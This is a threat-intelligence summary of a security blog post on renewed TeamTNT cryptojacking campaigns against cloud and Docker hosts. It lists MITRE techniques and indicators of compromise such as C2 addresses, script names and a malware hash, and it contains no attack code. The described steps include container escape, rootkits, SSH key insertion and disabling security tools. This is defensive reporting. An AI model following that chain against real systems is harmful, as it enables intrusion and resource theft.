The blog analyzes three recent honeypot infections attributed to TeamTNT, suggesting renewed activity after their 2021 farewell. It details multiple campaigns (Kangaroo, Cronb, What Will Be) that reuse familiar TeamTNT tools and techniques, including misconfigured cloud services, cryptomining, and container escape tactics, and notes a GitHub presence linked to TeamTNT. Hashtags: #TeamTNT #PollardsKangaroo #Diamorphine #Tsunami #Monero #Docker
Keypoints
- Three distinct TeamTNT-like attacks were observed on honeypots in early September, indicating renewed activity.
- The Kangaroo attack exploits a misconfigured Docker Daemon, deploys an Alpine container, and downloads a shell script to a C2 server.
- The Cronb component reuses old techniques (rootkits, cron persistence, SSH/keys for lateral movement) and deploys Monero cryptomining while evading defenses.
- The What Will Be attack leverages a Docker API release_agent vulnerability to escape the container and downloads additional scripts (en.sh) to optimize mining.
- Campaign tooling includes Gentoo/Debian/Ubuntu package managers, DNS/name-server adjustments, and known TeamTNT scripts (k.sh, c.sh, d.sh, b.sh, s.sh) with multiple rootkits (Diamorphine, prochider).
- GitHub activity under the account “wafferz” and references to a past TeamTNT server suggest ongoing or future operations; CNAPP recommendations are urged for cloud-native protection.
MITRE Techniques
- [T1046] Network Service Scanning – Used to identify misconfigured Docker Daemon targets during the Kangaroo attack. Quote: “…scanning for a misconfigured Docker Daemon…”
- [T1059.004] Unix Shell – Execution of shell scripts (k.sh, s.sh, c.sh, d.sh, b.sh) to install, download, and run payloads. Quote: “The file k.sh that was dropped and executed on the attacked server”
- [T1105] Ingress Tool Transfer – Downloading and executing tools/scripts from C2 (k.sh, en.sh, etc.). Quote: “downloading and running further shell scripts”
- [T1053.003] Cron – Use of cron-related scripts (cronb.sh, clean_cron, lock_cron) to gain persistence and manage tasks. Quote: “Deletes all cron scheduled jobs.”
- [T1021.004] SSH – Lateral movement via SSH keys (Inserts SSH key to the host). Quote: “Inserts TeamTNT’s SSH key to the host.”
- [T1014] Rootkit – Deployment of Diamorphine and Prochider rootkits to hide activity. Quote: “Diamorphine rootkit is deployed” and “Deploys prochider rootkit that hides itself.”
- [T1562.001] Impair Defenses – Deleting logs and stopping/deleting security tools (SELinux, watchdog, GCP aegis, etc.). Quote: “Deletes history and stops and deletes security tools such as SElinux, watchdog, gcloud of GCP, and aegis of Alibaba cloud.”
- [T1496] Resource Hijacking – Monero cryptomining and configuration deployment. Quote: “Downloading a Monero cryptominer and its configuration file and executing a cryptojacking attack.”
Indicators of Compromise
- [IP Address] 93.95.229.203 – C2 host used in Kangaroo attack (domain: whatwill.be on this IP).
- [IP Address] 205.185.118.246 – C2 host referenced by s.sh/dc.sh activities.
- [Domain] whatwill.be – C2 domain referenced in Kangaroo attack (mapped to 93.95.229.203).
- [File Hash] MD5 1ded4ed94ab31f1a3bba3a50cfa7238f – MD5 associated with Tsunami/syslog malware payload used in the campaigns.
- [File Name] k.sh – Shell script dropped and executed on attacked servers (Kangaroo).
- [File Name] s.sh – Supporting shell file used by multiple components.
- [File Name] c.sh – Script designed to detect/attack exposed Redis servers.
- [File Name] d.sh – Part of the docker/cron-related attack chain; related to en.sh/dc.sh flows.
- [File Name] b.sh – Script identical to cronb.sh used in the Cron-based campaign.
- [File Name] en.sh – Downloads and runs to optimize cryptomining (used in dock1/dock2 flows).
- [File Name] dc.sh – Shell file exploiting release_agent vulnerability for container escape.
- [File Name] syslog – Tsunami malware component referenced as a potential dropper.
- [Tool] zgrab, masscan, pnscan – Scanning utilities used by campaigns for discovery of targets.
- [Account] wafferz – GitHub account linked to the Kangaroo/Dock project and indicators of TeamTNT activity.
Read more: https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt